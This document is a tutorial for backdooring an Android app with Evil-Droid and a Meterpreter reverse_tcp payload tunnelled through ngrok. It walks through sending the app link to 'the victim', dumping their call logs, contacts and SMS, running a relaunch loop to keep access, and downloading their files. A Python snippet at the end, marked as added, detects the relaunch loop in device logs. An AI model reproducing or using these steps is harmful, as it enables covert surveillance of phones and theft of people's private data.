Hi, all tests were done on Kali Linux.
Create an account to use a TCP connection: https://ngrok.com. An email address from a service like http://www.yopmail.com/en/ works. After creating your account, just follow the instructions to download, unzip, and create a token.
# 7z x ngrok
# ./ngrok --authtoken xxx
Create a TCP tunnel on port 1234:
# ./ngrok tcp 1234
You will receive something like this:
tcp.ngrok.io:15322 -> localhost:1234
# git clone https://github.com/M4sc3r4n0/Evil-Droid
# cd Evil-Droid
# chmod +x evil-droid
# ./evil-droid
 BYPASS AV APK (ICON CHANGE)
 SET LHOST: tcp.ngrok.io
 SET LPORT: 15322
 PAYLOAD NAME: nice-app
 payload option: android/meterpreter/reverse_tcp
 choose payload apk: APK-MSF
Choose an image for your backdoored app.
Afterwards, evil-droid will create a self-signed certificate to sign your Android app. Once you have your app, copy the file to transfer.sh:
# cd Evil-Droid/evilapk
# curl --upload-file nice-app.apk https://transfer.sh/nice-app.apk
Give the link to the victim; she or he must install the app on their phone.
Open a new terminal; we use Metasploit to listen on port 1234.
# msfconsole
use multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 127.0.0.1
set lport 1234
exploit
To get the call log, contacts and SMS:
dump_calllog
dump_contacts
dump_sms
Use help for other commands.
Maintaining the access for longer
Now that you have access to the phone, we will upload a script to maintain the access until the phone shuts down.
Open another terminal to create a little script:
# vim backdoor.sh
#!/bin/bash
while :
do
  am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
  sleep 20
done
Back in Metasploit, where we are still on the phone:
cd /sdcards/download
upload backdoor.sh
shell
sh backdoor.sh
Press Ctrl+C to quit; every 20 seconds the script brings the app back.
If the victim's phone shuts down or restarts, you lose the access, because backdoor.sh does not start at boot :-(, and we don't have the root privilege to do this.
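Seen from the defender's side, the 20-second relaunch loop above leaves a regular trail in the device log. The following added example (not part of the original post) flags packages whose activity is started at a near-constant interval, or that use the com.metasploit.stage name from the script; the logcat line format, the sample lines and all function names are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import pstdev

# Constructed sample in `logcat -v threadtime` style; not captured from a device.
LINE_FMT = ("03-14 {t}  1234  1300 I ActivityManager: START u0 "
            "{{act=android.intent.action.MAIN cmp={c}}} from uid 10087")
SAMPLE_LOG = "\n".join(LINE_FMT.format(t=t, c=c) for t, c in [
    ("10:00:01.120", "com.metasploit.stage/.MainActivity"),
    ("10:00:05.000", "com.example.mail/.InboxActivity"),
    ("10:00:21.480", "com.metasploit.stage/.MainActivity"),
    ("10:00:41.910", "com.metasploit.stage/.MainActivity"),
    ("10:00:48.200", "com.example.mail/.InboxActivity"),
    ("10:01:02.300", "com.metasploit.stage/.MainActivity"),
    ("10:01:22.650", "com.metasploit.stage/.MainActivity"),
])

# Timestamp, then the package part of the started component (assumed format).
START_RE = re.compile(
    r"^(\d\d-\d\d \d\d:\d\d:\d\d\.\d{3}).*?Activity(?:Task)?Manager: START u\d+ "
    r"\{.*?cmp=([\w.]+)/")

KNOWN_NAMES = {"com.metasploit.stage"}  # package name used in the page's script


def find_relaunch_loops(log, min_starts=4, max_jitter=2.0):
    """Return {package: details} for packages started on a fixed cadence."""
    starts = defaultdict(list)
    for line in log.splitlines():
        m = START_RE.match(line)
        if m:
            # threadtime has no year; a fixed leap year keeps parsing unambiguous.
            ts = datetime.strptime("2000-" + m.group(1), "%Y-%m-%d %H:%M:%S.%f")
            starts[m.group(2)].append(ts)
    findings = {}
    for pkg, times in starts.items():
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        # Periodic: enough starts, and the gaps barely vary (seconds of std dev).
        periodic = len(times) >= min_starts and pstdev(gaps) <= max_jitter
        if periodic or pkg in KNOWN_NAMES:
            findings[pkg] = {
                "starts": len(times),
                "periodic": periodic,
                "mean_gap": round(sum(gaps) / len(gaps), 1) if gaps else None,
                "known_name": pkg in KNOWN_NAMES,
            }
    return findings


if __name__ == "__main__":
    for pkg, info in find_relaunch_loops(SAMPLE_LOG).items():
        print(pkg, info)
```

The cadence check does not depend on the package name, so it still fires when the name differs from the one in KNOWN_NAMES.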
To download files from the phone:
cd /sdcard
ls
cd download
download <filename>